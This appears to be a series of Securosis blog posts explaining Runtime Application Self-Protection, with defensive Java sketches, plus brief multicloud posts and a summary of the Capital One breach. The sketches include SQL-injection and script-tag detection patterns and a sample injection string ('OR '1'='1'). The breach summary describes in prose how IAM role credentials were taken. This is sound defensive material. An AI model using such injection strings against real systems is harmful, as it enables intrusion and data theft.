Understanding and Selecting RASP 2019: Integration

Posted under: Heavy Research

Editor's note: we have been experiencing some VPN interruptions, so I apologize for the uneven cadence at which these posts are being delivered. We are working on fixing the issue.

In this section we outline how RASP fits into the technology stack, both during production deployment and within the build processes used to create applications. We will show what that looks like, and why it is important for newer application security technologies to fit within these models. We will close this section with a discussion of how RASP differs from other security technologies, and the advantages and tradeoffs of the differing approaches.

As we mentioned in the introduction, our research into DevOps unearthed many questions on RASP. The questions came from non-traditional buyers of security products: application developers and product managers. Their teams, by and large, were running Agile development processes, and they wanted to know whether RASP could effectively block attacks and fit within their process.

I filtered through hundreds of customer call notes from the last two years; the following are the top 7 RASP questions customers asked, more or less in order of how often each came up:

  • We presently use static analysis in our build process, but we are looking for solutions that scan code more quickly and we would also like a ‘preventative’ option. Can RASP help?
  • Development releases code twice daily, which is a little scary, because we only scan with static analysis once a week/month. Is RASP a suitable protection to fill in the gaps between scans?
  • We would like a solution that provides some 0-day protection at runtime, and sees the application calls.
  • Development is moving to a micro-services architecture, and WAF only provides visibility at the edge. Can we embed monitoring and blocking into micro-services?
  • We have lots of applications with security technical debt, our in-house and third-party code is not fully scanned, and we need XSS/XSRF/injection protection. Should we look at WAF or RASP?
  • We are looking at a ‘defense in depth’ approach to application security and want to know if we can run WAF with RASP?
  • We want to 'shift left': both to move security as early as possible, and to embed application security into the application development process. Can RASP help?

Why do we bring these questions up here? To show how changes in application deployment, the speed of application development, and the diminished fit of WAF are generating interest in RASP. It is those changes we want to highlight, to provide a better understanding of how RASP addresses the new requirements.

Build Integration

The majority of firms we spoke with are leveraging automation to provide Continuous Integration — essentially automated building and testing of applications as new code is checked in. Some have gone as far as Continuous Deployment (CD) and DevOps. To address this development-centric perspective, we offer the diagram below to illustrate a modern Continuous Deployment / DevOps application build environment. Consider each arrow a script automating some portion of source code control, building, packaging, testing, or deployment of an application.

This is what the build pipeline looks like. Each time application code is checked in, or a change is made in a configuration management tool (e.g. Chef, Puppet, Ansible, Salt), the build server (e.g. Jenkins, Bamboo, MSBuild, CircleCI) grabs the most recent bundle of code, templates, and configuration, and builds the product. This may result in a machine image, a container, or an executable. If the build is successful, a test environment is automatically started and a battery of functional, regression, and security tests is run. If the new code passes these tests it is passed along to QA, or put into pre-production to await final approval and rollout to production.

This degree of automation in the build and QA processes is how development teams become faster and more agile. Some firms release code into production ten times a day. Because of the sheer speed automation creates, security needs to deploy technologies that can keep pace with development — which means selecting tools that embed into this pipeline.

Production Integration

The build pipeline gives us a mechanical view of development; taking a more process-centric view gives a different picture of where security technologies can fit. The following diagram shows the logical phases of code development, each phase staffed by people performing different roles (e.g. architects, developers, build managers, QA, release management, IT and IT Security). While the step-by-step nature of this diagram may imply waterfall development, do not be misled: these phases apply to any development process, including spiral, waterfall, and Agile.

The graphic below illustrates the major phases teams go through. The callouts map the common types of security tests to specific phases within Waterfall, Agile, CI, and DevOps frameworks. Keep in mind that it is still early days for automated deployment and DevOps. Many security tools were built before rapid and automated deployment existed or was well known. Older products are typically too slow, some cannot focus their tests on new code, and others do not offer API support. So orchestration of security tools — basically what works where — is still maturing. The time each type of test takes to run, and the type of result it returns, drives where it fits best into the phases above.

RASP is designed to be bundled into applications, so it is part of the application delivery process. RASP components can be included as part of the application, typically installed and configured under a configuration management script, so it starts up along with the application stack. RASP offers two distinct approaches to help tackle application security: the first is in the pre-release / pre-deployment phase, the second in production. In pre-release it is used to instrument an application and to verify that it detects pen tests, red team tests, or other synthetic attacks launched against the app during testing. In the latter, it is deployed as a monitoring and blocking tool. Either way, deployment looks very similar.

  • Pre-release testing: This is exactly what it sounds like: RASP is used when the application is fully constructed and going through final tests prior to launch. Here RASP can be deployed in several ways. It can be deployed to monitor only, using application tests and instrumenting runtime behavior to learn how to protect the application. Alternatively, RASP can monitor while security tests are invoked in an attempt to break the application, with RASP performing security analysis and transmitting its results, so development and testing teams can learn whether RASP detected the tested attacks. Finally, RASP can be deployed in full blocking mode, to see whether security tests were detected and blocked, and how blocking impacted the user experience. This provides an opportunity to change application code or augment the RASP rules before the application goes into production. (A minimal sketch contrasting monitoring and blocking modes follows this list.)
  • Production testing: Once an application is placed in a production environment, either before actual customers are using it (using Blue-Green deployment) or afterwards, RASP can be configured to block malicious application requests. Regardless of how the RASP tool works (whether via embedded runtime libraries, servlet filters, in-memory execution monitoring, application instrumentation or virtualized code paths), it protects applications by detecting attacks in live runtime behavior. This model essentially provides execution path scanning, monitoring all user requests and parameters. Unlike technologies which block requests at the network or web proxy layer, RASP inspects requests at the application layer, which means it has full access to the application’s inner workings. Working at the API layer provides better visibility to determine whether a request is malicious, and more focused blocking capabilities than external security products.
  • Runtime protection: Ultimately RASP is not just for testing, but for full runtime protection and blocking of attacks. Not just the typical cross-site scripting (XSS), SQL injection (SQLi), cross-site request forgery (XSRF), or other common web application attacks, but also malicious code execution, weak authentication, improper session management, use of vulnerable 3rd party software, and misuse of custom code. And it understands attacks specific to the platforms (e.g. .NET, Java) and application frameworks (e.g. Spring, Struts, Play). RASP is in a unique position to protect applications from a broad set of application attacks. Again, monitoring and protecting at the application layer provides subtle context and behavioral clues that substantially improve detection, with low to no false positives.
  • Development & IAST: Some RASP platforms also double as IAST – Interactive Application Security Testing – tools. This means they can be 'shifted left' to the point of code creation, providing testing benefits before code is checked in or built. Testing in development is not as common, as many developers are not in the habit of – nor incentivized to – test prior to checking in code. But these testing tools have the benefit of finding many security flaws early in the process and educating developers on how to build secure code.
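
To make the monitor-versus-block distinction above concrete, here is a minimal, hypothetical Java sketch of how a RASP hook might branch on its configured mode. The class and method names are illustrative assumptions, not any vendor's API.

```java
// Hypothetical illustration of RASP deployment modes; not any vendor's API.
public final class RaspHook {

    // MONITOR: record and report only. BLOCK: stop the request outright.
    public enum Mode { MONITOR, BLOCK }

    private final Mode mode;

    public RaspHook(Mode mode) {
        this.mode = mode;
    }

    // Assumed to be invoked by a sensor just before a sensitive operation,
    // such as executing a database query built from user input.
    public void onSensitiveOperation(String userInput) {
        if (!looksMalicious(userInput)) {
            return; // benign request: let the application continue untouched
        }
        if (mode == Mode.MONITOR) {
            // Pre-release testing: log the detection so development and test
            // teams can verify the attack was seen, without disturbing the app.
            System.err.println("[RASP] would block request containing: " + userInput);
        } else {
            // Production blocking: raise an error for the application to handle,
            // so the malicious request never reaches the database.
            throw new SecurityException("Request blocked by runtime protection");
        }
    }

    // Toy detection logic; real products apply far richer, context-aware analysis.
    private boolean looksMalicious(String input) {
        return input != null && input.toLowerCase().contains("' or '1'='1");
    }
}
```

In a real product the mode, rules, and reporting destination come from the vendor's policy configuration rather than code, but the operational difference between pre-release monitoring and production blocking is essentially this branch.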

To WAF or not to WAF

Most organizations we spoke with stated their basic requirement was for something that works within their development pipeline. WAF's lack of APIs for automatic setup, the time needed to learn application behavior, and most importantly its inability to pinpoint vulnerable code modules were all cited as reasons WAF failed to satisfy developers. Granted, these requests came from more 'Agile' teams, more often building new applications than maintaining existing platforms. Still, we heard consistently that RASP meets a market demand unsatisfied by other application security technologies.

Note that WAF was already in place at almost every client we spoke with, and there was no intent to remove the existing technology. Some cited PCI-DSS as the reason for leaving it in place, some cited a 'defense in depth' strategy, while others were not yet comfortable enough with RASP to perform a 'rip & replace'. So for most who adopt RASP, it runs alongside WAF.

It is important to recognize that these technologies are complementary, not necessarily competitive. There is absolutely no reason you can’t run RASP behind your existing WAF. Some organizations use cloud-based WAF as front-line protection, while embedding RASP into applications. Some use WAF to provide “threat intelligence”, DDoS protection, and network security, while using RASP to fine-tune application security — often supplanting WAF’s ‘white listing’ capability. Still others double down with overlapping security functions, much the way many organizations use layered anti-spam filters, accepting redundancy for broader coverage or unique benefits from each product. WAF platforms have a good ten-year head start, with broader coverage and very mature platforms, so some firms are loath to throw away WAF until RASP is fully proven, or until RASP is viewed as an acceptable compensating control for regulations like PCI-DSS.

– Adrian Lane

Understanding and Selecting RASP 2019: Technology

Posted under: Heavy Research

Here we discuss the technical facets of RASP products, including how the technology works, how it integrates into an application environment, and the advantages of each approach. We will also outline some important considerations, such as platform support, which will impact your selection process. Finally, we will consider a couple of aspects of RASP technology which we expect to evolve over the next couple of years.

How The Technology Works

Over the last couple of years the market has settled on a handful of basic approaches to RASP, with different variations to enhance detection, reliability, or performance. Understanding the underlying technology should greatly assist the reader in understanding the strengths and weaknesses of each offering.

  • Instrumentation: With this deployment model RASP places sensors/callbacks at key junctions within the application stack, to see application behavior within — and between — custom code, application libraries, frameworks, and the underlying operating system. This approach is commonly implemented using native application profiler/instrumentation APIs to monitor application behavior at runtime. When a sensor is hit, RASP gets a callback and evaluates the request against the subset of policies relevant to the request and application context. For example, database queries are examined for SQL injection (SQLi). These products also provide request de-serialization 'sandboxing' to detect malicious payloads, and what I prefer to call 'checkpointing', where a request that hits checkpoint A but bypasses checkpoint B can deterministically be said to be hostile. This provides far more advanced application monitoring than WAF, with nuanced detection of attacks and misuse. However, it does require the solution to monitor all relevant interfaces to provide full visibility, at some cost to performance and scalability: essentially a balancing act between thorough coverage and performance. (A minimal Java agent sketch follows this list.)
  • Servlet Filters & Plugins: Some RASP platforms are implemented as web server plug-ins or Java servlet filters, typically installed into Apache Tomcat, JBoss, or Microsoft .NET to process requests. Plugins filter requests before they reach functions like database queries or transactions, applying detection rules to each request received. Requests that match known attack signatures are blocked. They offer no less functionality than a WAF blacklist, with some added protections such as lexical analysis of inbound request structures. This is a simple approach for retrofitting protection into an application environment, and is effective at blocking malicious requests, but it doesn't offer the depth of application understanding possible with other integration approaches. (A simplified filter example follows this list.)
  • Library or JVM replacement: Some RASP products are installed by replacing standard application libraries or JAR files, and at least one vendor offers full replacement of the Java Virtual Machine. This method basically intercepts calls from the application to the underlying platform, so the RASP platform passively 'sees' application calls to supporting functions, applying rules as requests are intercepted. In the case of JVM replacement, the RASP can alter classes as they are loaded into memory, augmenting or patching the application and application stack. Like instrumentation, this approach provides complete visibility into application behavior and performs analysis of user requests. Some customers we spoke with preferred the automated application of platform patches, but the majority were uncomfortable with dynamic alteration of the application stack in production.
  • Instrumentation & Static Hybrid: Like many firewalls, some RASP platforms can deploy as a reverse proxy, and several vendors offer this as an option. In one case there is a novel variant which couples the proxy, an instrumentation module, and parts of a static analysis scan. Essentially it generates a Code Property Graph – like a static analysis tool – to build custom security controls for all application and open source functions. This approach requires full integration into the application build pipeline in order to scan all source code, then bundles the scan result into the RASP engine as the application is deployed, effectively providing an application-specific functionality whitelist. The security controls are tailored to the application, offering excellent code coverage, at the expense of full build integration, the need to regularly rebuild the CPG profile, and some added latency for security checks.
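
To make the instrumentation model concrete, here is a minimal sketch of a Java agent built on the standard java.lang.instrument API. It is purely illustrative: it only logs where a commercial RASP agent would rewrite bytecode to insert its sensors, and the class-name filter is an assumption, not any vendor's implementation.

```java
import java.lang.instrument.ClassFileTransformer;
import java.lang.instrument.Instrumentation;
import java.security.ProtectionDomain;

// Minimal illustration of the instrumentation deployment model.
// Launched with: java -javaagent:rasp-agent.jar -jar myapp.jar
public final class RaspAgent {

    public static void premain(String agentArgs, Instrumentation inst) {
        inst.addTransformer(new ClassFileTransformer() {
            @Override
            public byte[] transform(ClassLoader loader, String className,
                                    Class<?> classBeingRedefined,
                                    ProtectionDomain protectionDomain,
                                    byte[] classfileBuffer) {
                // A real RASP agent would rewrite the bytecode here to place
                // sensors/callbacks at key junctions: JDBC calls, deserialization,
                // file and network I/O. This sketch only notes the opportunity.
                if (className != null && className.contains("Repository")) {
                    System.out.println("[RASP] could instrument " + className);
                }
                return null; // null tells the JVM to leave the class unchanged
            }
        });
    }
}
```

A real agent also needs a Premain-Class entry in its JAR manifest; the point here is simply that the callback fires inside the application process, with visibility into everything being loaded and executed.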
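
For comparison, here is a similarly simplified sketch of the servlet filter model, using the standard javax.servlet API. The single regular expression stands in for what would be a vendor's much larger, context-aware rule set.

```java
import java.io.IOException;
import java.util.regex.Pattern;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletResponse;

// Simplified illustration of the servlet filter deployment model.
public class RaspServletFilter implements Filter {

    // Toy signature list; real products apply much richer rules.
    private static final Pattern SUSPICIOUS =
            Pattern.compile("(?i)('\\s*or\\s*'1'\\s*=\\s*'1|<script)");

    @Override
    public void doFilter(ServletRequest request, ServletResponse response,
                         FilterChain chain) throws IOException, ServletException {
        // Inspect every request parameter before the application sees it.
        for (String[] values : request.getParameterMap().values()) {
            for (String value : values) {
                if (value != null && SUSPICIOUS.matcher(value).find()) {
                    ((HttpServletResponse) response)
                            .sendError(HttpServletResponse.SC_FORBIDDEN, "Request blocked");
                    return; // the malicious request is never forwarded
                }
            }
        }
        chain.doFilter(request, response); // benign requests continue as normal
    }

    @Override public void init(FilterConfig filterConfig) { }
    @Override public void destroy() { }
}
```

Because the filter runs inside the servlet container it sees the decoded request, but it still lacks the deeper execution context the instrumentation approach provides.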

There have been several other small companies that have come and gone over the last couple of years, with a mixture of application logic crawlers (DAST) rule sets, application virtualization to mimic the replacement model listed above, and mirroring runtimes in cloud services. The full virtualization approach was interesting, but being too early to market and being dead wrong in approach are virtually indistinguishable. Still, I expect over time we will see new variations on RASP detection capabilities, possibly in the area of AI, and new cloud services for added layers of support.

Detection

How RASP products detect attacks is complicated, with multiple techniques employed depending upon the type of request being made. Most examine both requests and their associated parameters, and each is subject to multiple types of inspection. The good news is that RASP is far more effective at detecting application attacks. Unlike technologies which rely on signature-based detection, RASP fully decodes parameters and external references, maps application functions and third-party code usage, maps execution sequences, de-serializes payloads, and applies policies accordingly. This not only allows more accurate detection, but also helps performance, because the checks performed are optimized to the context of the request and the execution path within the code. And because rules are enforced at the point of use, it is far easier to understand proper usage and detect misuse.

Most RASP platforms employ structural analysis as well. They understand which framework is in use, and the common set of vulnerabilities that framework suffers from. Because RASP understands the entire application stack, it can detect variations in third-party code libraries — essentially a vulnerability scan of open source — to determine whether outdated code is in use. RASP can also quickly vet incoming requests and detect injection attacks. There are several approaches; one is a form of tokenization — substituting tokens for clauses and parameters — to quickly check that any given request matches its intended structure. For example, by tokenizing the clauses and parameters in a SQL query, you can quickly detect when a 'FROM' or 'WHERE' clause has more tokens than it should, meaning the query has been altered. A simplified sketch of this check appears below.
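
As a rough illustration of the tokenization idea (and only that; real engines use full SQL parsers and far richer policies), this hypothetical sketch compares the token count of the query a developer wrote against the query actually built at runtime:

```java
import java.util.Arrays;
import java.util.List;

// Rough illustration of structural tokenization for SQL injection detection.
// Real RASP engines use full SQL parsers; this sketch only counts tokens.
public final class SqlStructureCheck {

    private static List<String> tokenize(String sql) {
        // Pad comparison operators with spaces, then split on whitespace.
        String spaced = sql.replaceAll("([=<>])", " $1 ");
        return Arrays.asList(spaced.trim().split("\\s+"));
    }

    // True if the query built at runtime has more tokens than the template the
    // developer wrote, suggesting user input altered the query structure.
    public static boolean structureAltered(String template, String runtimeQuery) {
        return tokenize(runtimeQuery).size() > tokenize(template).size();
    }

    public static void main(String[] args) {
        String template = "SELECT * FROM users WHERE name = ?";
        String benign   = "SELECT * FROM users WHERE name = 'alice'";
        String attack   = "SELECT * FROM users WHERE name = 'alice' OR '1'='1'";

        System.out.println(structureAltered(template, benign)); // false
        System.out.println(structureAltered(template, attack)); // true
    }
}
```

A real engine applies this kind of comparison at the point the query executes, where it knows exactly which statement the developer intended.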

Blocking

When an attack is detected, because RASP sits within the application, most products throw an application error. The malicious request is not forwarded, and the application is responsible for a graceful response and for maintaining application state. Products that offer full instrumentation can halt the execution sequence at runtime, when something bad is detected but before it executes. What is reported to the user is entirely up to the application developers. That said, this can create issues with server-side application stability and user experience. RASP offers some capabilities to tune response behaviors, but these should be examined on a vendor-by-vendor basis.

Language Support

The single biggest growing pain for the RASP vendor community has been language support. Java, JavaScript, C#, and Visual Basic may comprise the bulk of application code developed, but Python, Ruby, PHP, Go, and numerous others are in wide use. For each vendor we spoke with during our research, language support was a large part of the product roadmap. Most provide full support for core platforms like Java and .NET; beyond that, support is still a little spotty. You will need to check with your vendor on which languages, and which versions, are supported.

Another part of the problem is the complexity of the environment; not just the server side but the client side as well. Over the last few years we have witnessed an expanding universe of frameworks, client side utilities, web-facing APIs and changing fashions for data encoding. Consider that RASP needs to parse XML and JSON, handle diverse clients running Javascript and Angular.js, micro-service architectures and possibly multiple versions of APIs all at the same time. The diversity of application environments makes it challenging for all RASP vendors to provide full support. If your application doesn’t run on a standard platform you will need to discuss support in great detail with the vendors prior to purchase. Within the next year or two we expect this issue to largely go away, but for now it is a key decision factor for buyers.

Performance and Scalability

Because RASP embeds within the application or its supporting stack, once bundled with the application it scales with that application. For example, if the scalability model means more copies of the application running on more server instances, RASP runs atop those additional instances as well. If deployed on virtual or cloud servers, RASP benefits from added CPU and memory resources along with the application.

From the latency and performance perspectives, RASP enforcement rules — both how they operate and the number of checks employed — should be considered. More analysis applied to incoming requests provides better security, but at a cost in latency. If third-party threat intelligence is not cached locally, or external lookups are used, latency increases. If the sensors or integration points only collect events, and the events are passed to an external server for analysis, that additional hop increases latency as well. As we recommend with all security products, don't trust vendor-supplied numbers; run tests in your environment with traffic that represents real application usage. That said, vendors have applied considerable engineering resources to performance over the last couple of years, so latency issues have become far less common.
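
As a hypothetical illustration of the caching point, the sketch below shows one way an in-process agent might cache external threat-intelligence verdicts so the per-request hot path usually avoids a network round trip; the remote lookup is a placeholder, not a real service call.

```java
import java.time.Duration;
import java.time.Instant;
import java.util.concurrent.ConcurrentHashMap;

// Illustrative local cache for external threat-intelligence verdicts, so the
// per-request hot path usually avoids a network round trip.
public final class ThreatIntelCache {

    private static final Duration TTL = Duration.ofMinutes(15);

    private static final class Entry {
        final boolean malicious;
        final Instant fetchedAt;
        Entry(boolean malicious, Instant fetchedAt) {
            this.malicious = malicious;
            this.fetchedAt = fetchedAt;
        }
    }

    private final ConcurrentHashMap<String, Entry> cache = new ConcurrentHashMap<>();

    public boolean isMaliciousSource(String sourceIp) {
        Entry cached = cache.get(sourceIp);
        if (cached != null && cached.fetchedAt.plus(TTL).isAfter(Instant.now())) {
            return cached.malicious; // fast path: answered from memory
        }
        boolean verdict = remoteLookup(sourceIp); // slow path: external service call
        cache.put(sourceIp, new Entry(verdict, Instant.now()));
        return verdict;
    }

    // Placeholder for a call to an external reputation service (assumption).
    private boolean remoteLookup(String sourceIp) {
        return false;
    }
}
```

Whether a product does this kind of caching, and how stale a cached verdict may become, is exactly the sort of latency question worth asking vendors.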

Instrumentation

Security teams often want visibility into application security, and it is increasingly common for them to use scans in the build pipeline, pre-production, and production to create metrics and visibility into application security posture. This tells them where they need to deploy more resources, and allows them to better gauge the effectiveness of the resources they have already deployed.

One huge advantage of RASP is that it can instrument application usage and defect rates. Part of this capability is what we mentioned above: RASP can catalog application functions, understand the correct number and type of parameters, and then apply policies within the code of the running application. But it can also understand runtime code paths, server interaction, open source, nuances of frameworks, library usage, and custom code. This offers advantages in the ability to tailor detection rules, such as employing specific policies to detect attacks against the Spring framework, or blocking specific attacks against older versions of libraries to provide a form of virtual patching. It also offers non-security benefits to developers, quality assurance, and operations teams, showing how code is used and providing a runtime map which reveals things like performance bottlenecks and unused code.

– Adrian Lane

Understanding and Selecting RASP 2019: Use Cases

Posted under: Heavy Research

The primary function of RASP is to protect web applications against known and emerging threats. In some cases it is deployed to block attacks at the application layer before vulnerabilities can be exploited, but in many cases RASP tools process a request normally until they detect an attack, and then block the action.

Astute readers will notice that these are basically the classic use cases for Intrusion Detection Systems (IDS) and Web Application Firewalls (WAFs). So why look for something new, if other tools in the market already provide the same application security benefits? The answer lies not in what RASP does, but in how it works, which makes it more effective across a wide range of scenarios.

Let’s delve into detail about what clients are asking for, so we can bring this into focus.

Primary Market Drivers

RASP is a relatively new technology, so current market drivers are tightly focused on addressing the security needs of two distinct “buying centers” which have been largely unaddressed by existing security applications. We discovered this important change since our last report in 2017 through hundreds of conversations with buyers, who expressed remarkably consistent requirements. The two “buying centers” are security and application development teams. Security teams are looking for a reliable WAF replacement without burdensome management requirements, and development teams ask for a security technology to protect applications within the framework of existing development processes.

The security team requirement is controversial, so let's start with some background on WAF functions and usability. It is essential to understand the problems driving firms toward RASP.

Web Application Firewalls typically employ two methods of threat detection: blacklisting and whitelisting. Blacklisting is detection – and often blocking – of known attack patterns spotted within incoming application requests; SQL injection is a prime example. Blacklisting is useful for screening out many basic attacks against applications, but new attack variations keep showing up, so blacklists cannot stay current, and attackers keep finding ways to bypass them. SQL injection and its many variants are the best illustration.

But whitelisting is where WAFs provide their real value. A whitelist is created by watching and learning acceptable application behaviors, recording legitimate behaviors over time, and preventing any requests which do not match the approved behavior list. This approach offers substantial advantages over blacklisting: the list is specific to the application monitored, which makes it feasible to enumerate good functions – instead of trying to catalog every possible malicious request – and therefore easier (and faster) to spot undesirable behavior.
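
As a toy illustration of the two models (the patterns and the 'learned' request list below are invented examples, not any vendor's rules):

```java
import java.util.Set;
import java.util.regex.Pattern;

// Toy illustration of the two WAF detection models described above.
public final class WafModels {

    // Blacklisting: block anything matching known-bad patterns.
    private static final Pattern KNOWN_BAD =
            Pattern.compile("(?i)(union\\s+select|<script|\\.\\./)");

    public static boolean blacklistBlocks(String requestBody) {
        return KNOWN_BAD.matcher(requestBody).find();
    }

    // Whitelisting: allow only requests matching behavior learned for one
    // specific application (here, a fixed set of method + path combinations).
    private static final Set<String> LEARNED_GOOD = Set.of(
            "GET /catalog",
            "GET /catalog/item",
            "POST /cart/add");

    public static boolean whitelistAllows(String method, String path) {
        return LEARNED_GOOD.contains(method + " " + path);
    }
}
```

Even in this sketch the asymmetry is clear: the blacklist has to anticipate every malicious pattern, while the whitelist only has to describe the one application it protects, which is also why it must be re-learned every time the application changes.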

Unfortunately, developers complain that in the normal course of application deployment, a WAF can never complete whitelist creation – ‘learning’ – before the next version of the application is ready for deployment. The argument is that WAFs are inherently too slow to keep up with modern software development, so they devolve to blacklist enforcement. Developers and IT teams alike complain that WAF is not fully API-enabled, and that setup requires major manual effort. Security teams complain they need full-time personnel to manage and tweak rules. And both groups complain that, when they try to deploy into Infrastructure as a Service (IaaS) public clouds, the lack of API support is a deal-breaker. Customers also complain of deficient vendor support beyond basic “virtual appliance” scenarios – including a lack of support for cloud-native constructs like application auto-scaling, ephemeral application stacks, templating, and scripting/deployment support for the cloud. As application teams become more agile, and as firms expand their cloud footprint, traditional WAF becomes less useful.

To be clear, WAF can provide real value – especially commercial WAF "Security as a Service" offerings, which focus on blacklisting and some additional protections like DDoS mitigation. These are commonly run in the cloud as a proxy service, often filtering requests "in the cloud" before they pass into your application and/or RASP solution. But they are limited to a 'Half-a-WAF' role – without the sophistication or integration to leverage whitelisting. Traditional WAF platforms continue to work for on-premise applications with slower deployment, where the WAF has time to build and leverage a whitelist. So existing WAFs are largely not being "ripped and replaced", but they go mostly unused in the cloud and by more agile development teams.

So security teams are looking for an effective application security tool which is easier to manage than WAF, to replace it. They need to cover application defects and technical debt – not every defect can be fixed in code in a timely fashion.

Developer requirements are more nuanced: they cite the same end goal, but tend to ask which solutions can be fully embedded into existing application build and certification processes. To work with development pipelines, security tools need to go the extra mile, protecting against attacks and accommodating the disruption underway in the developer community. A solution must be as agile as application development, which often starts with compatible automation capabilities. It needs to scale with the application, typically by being bundled with the application stack at build time. It should ‘understand’ the application and tailor its protection to the application runtime. A security tool should not require that developers be security experts. Development teams working to “shift left” to get security metrics and instrumentation earlier in their process want tools which work in pre-production, as well as production.

RASP offers a distinct blend of capabilities and usability options which make it a good fit for these use cases. This is why, over the last three years, we have been fielding several calls each week to discuss it.

Functional Requirements

The market drivers mentioned above change traditional functional requirements – the features buyers are looking for.

  • Effectiveness: This seems like an odd buyer requirement. Why buy a product which does not actually work? But many security tools don't work well, produce too many false positives to be usable, or require so much maintenance that building your own bespoke tool seems like a better investment. RASP typically provides full capabilities without run-time learning of application functions, offers broader coverage of application threats by running in the application context, and can run in blocking mode. This last point is especially important in light of current application threats, such as the Capital One cloud hack.
  • API Support & Automation: Most of our readers know what Application Programming Interfaces (APIs) are and how they are used. Less well known is the rapidly expanding need for programmatic interfaces in security products, thanks to application delivery disruptions brought by cloud services and DevOps. APIs are how we orchestrate building, testing, and deployment of applications. Security products like RASP offer full platform functionality via API – sometimes as build server plug-ins or even as cloud services – enabling software engineers to work with RASP in their native metaphor. And they provide agents, containers, or plug-ins which work within the application stack.
  • Application Awareness: As attackers continue to move up the stack, from networks to servers to applications, attacks tailored to application frameworks and languages are becoming the norm. RASP differentiates on its ability to include application context in security policies. Many WAFs offer ‘positive’ security capabilities (whitelisting valid application requests), but embedding within applications provides additional application access and instrumentation to RASP. Further, some RASP platforms assist developers by referencing modules or lines of suspect code. For many development teams, better detection capabilities are less important than having RASP pinpoint vulnerable code.
  • Pre-Deployment Validation: The earlier in the production cycle errors are discovered, the easier – and cheaper – they are to fix. This is especially important for expensive or dangerous technologies such as cars and pacemakers. So testing in general, and security testing in particular, works better earlier in the development process. Rather than relying on vulnerability scanners and penetration testers after application deployment, more and more application security testing is performed pre-deployment. Of course this is possible with other application-centric tools, but RASP is easier to build into automated testing, can often determine which parts of an application have vulnerabilities, and is commonly used during red-team exercises and pre-production 'blue/green' deployment scenarios.

When we wrap up this series with a buyer’s guide, we will examine other technical differentiators which come into play during evaluation.

Next we will discuss the three major architectural approaches RASP vendors employ to deliver their solutions.

– Adrian Lane

Understanding and Selecting RASP: 2019

Posted under: Heavy Research

During our 2015 DevOps research conversations, developers consistently turned the tables on us, asking dozens of questions about embedding security into their development process. We were surprised to discover how much developers and IT teams are taking larger roles in selecting security solutions, working to embed security products into tooling and build processes. Just like they use automation to build and test product functionality, they automate security too.

But the biggest surprise was that every team asked about RASP, Runtime Application Self-Protection. Each team was either considering RASP or already engaged in a proof-of-concept with a RASP vendor. This was typically in response to difficulties with existing Web Application Firewalls (WAF) – most teams still carry significant “technical debt”, which requires runtime application protection. Since 2017 we have engaged in over 200 additional conversations on what gradually evolved into ‘DevSecOps’ – with both security and development groups asking about RASP, how it deploys, and benefits it can realistically provide. These conversations solidified the requirement for more developer-centric security tools which offer the agility developers demand, provide metrics prior to deployment, and either monitor or block malicious requests in production.

Research Update

Our previous RASP research was published in the summer of 2016. Since then Continuous Integration for application build processes has become the norm, and DevOps is no longer considered a wild idea. Developers and IT folks have embraced it as a viable and popular approach for producing more reliable application deployments. But it has raised the bar for security solutions, which now need to be as agile and embeddable as developers' other tools to be taken seriously. The rise of DevOps has also raised expectations for integration of security monitoring and metrics. We have witnessed the disruptive innovation of cloud services, with companies pivoting from "We are not going to the cloud" to "We are building out our multi-cloud strategy" in three short years. These disruptive changes have spotlit the deficiencies of WAF platforms, both their lack of agility and their inability to go "cloud native".

Similarly, we have observed advancements in RASP technologies and deployment models. With all these changes it has become increasingly difficult to differentiate one RASP platform from another. So we are kicking off a refresh of our RASP research. We will dive into the new approaches, deployment models, and revised selection criteria for buyers.

Defining RASP

Runtime Application Self-Protection (RASP) is an application security technology which embeds into an application or application runtime environment, examining requests at the application layer to detect attacks and misuse in real time. RASP products typically contain the following capabilities:

  • Unpack and inspect requests in the application context, rather than at the network or HTTP layer
  • Monitor and block application requests; products can sometimes alter requests to strip out malicious content
  • Fully functional through RESTful APIs
  • Protect against all classes of application attacks, and detect whether an attack would succeed
  • Pinpoint the module, and possibly the specific line of code, where a vulnerability resides
  • Instrument application functions and report on usage

As with all our research, we welcome public participation in comments to augment or discuss our content. Securosis is known for research positions which often disagree with vendors, analyst firms, and other researchers, so we encourage civil debate and contribution. The more you add to the discussion, the better the research!

Next we will discuss RASP use cases and how they have changed over the last few years.

– Adrian Lane

Firestarter: Multicloud Deployment Structures and Blast Radius

In this, our second Firestarter on multicloud deployments, we start digging into the technological differences between the cloud providers. We start with the concept of how to organize your account(s). Each provider uses different terminology but all support similar hierarchies. From the overlay of AWS organizations to the org-chart-from-the-start of an Azure tenant we dig into the details and make specific recommendations. We also discuss the inherent security barriers and cover a wee bit of IAM.

Watch or listen: [video and audio embedded in the original post]

DisruptOps: Breaking Attacker Kill Chains in AWS: IAM Roles

Over the past year I've seen a huge uptick in interest in concrete advice on handling security incidents inside the cloud, with cloud-native techniques. As organizations move their production workloads to the cloud, it doesn't take long for security professionals to realize that the fundamentals, while conceptually similar, are quite different in practice. One of those core concepts is the kill chain, a term first coined by Lockheed Martin to describe the attacker's process. Break any link and you break the attack, which maps well to combining defense in depth with the active components of incident response.

Read the full post at DisruptOps.

Firestarter: So you want to multicloud?

This is our first in a series of Firestarters covering multicloud. Using more than one IaaS cloud service provider is, well, a bit of a nightmare. Although this is widely recognized by anyone with hands-on cloud experience, that doesn't mean reality always matches our desires. From executives worried about lock-in to M&A activity, we are finding that most organizations are being pulled into multicloud deployments. In this first episode we lay out the top-level problems and recommend some strategies for approaching them.

Watch or listen: [video and audio embedded in the original post]

What We Know about the Capital One Data Breach

I’m not a fan of dissecting complex data breaches when we don’t have any information. In this case we do know more than usual due to the details in the complaint filed by the FBI.

I want to be very clear that this post isn’t to blame anyone and we have only the most basic information on what happened. The only person we know is worthy of blame here is the attacker.

As many people know Capital One makes heavy use of Amazon Web Services. We know AWS was involved in the attack because the federal complaint specifically mentions S3. But this wasn’t a public S3 bucket.

Again, all from the filed complaint:

  • The attacker discovered a server (likely an instance – it had an IAM role) with a misconfigured firewall. It presumably had a software vulnerability or was vulnerable due to a credential exposure.
  • The attacker compromised the server and extracted its IAM role credentials. These ephemeral credentials allow AWS API calls. Role credentials are rotated automatically by AWS, and are much more secure than static credentials. But with persistent access the attacker can obviously refresh the credentials as needed.
  • Those credentials (an IAM role with ‘WAF’ in the title) allowed listing S3 buckets and read access to at least some of them. This is how the attacker exfiltrated the files.
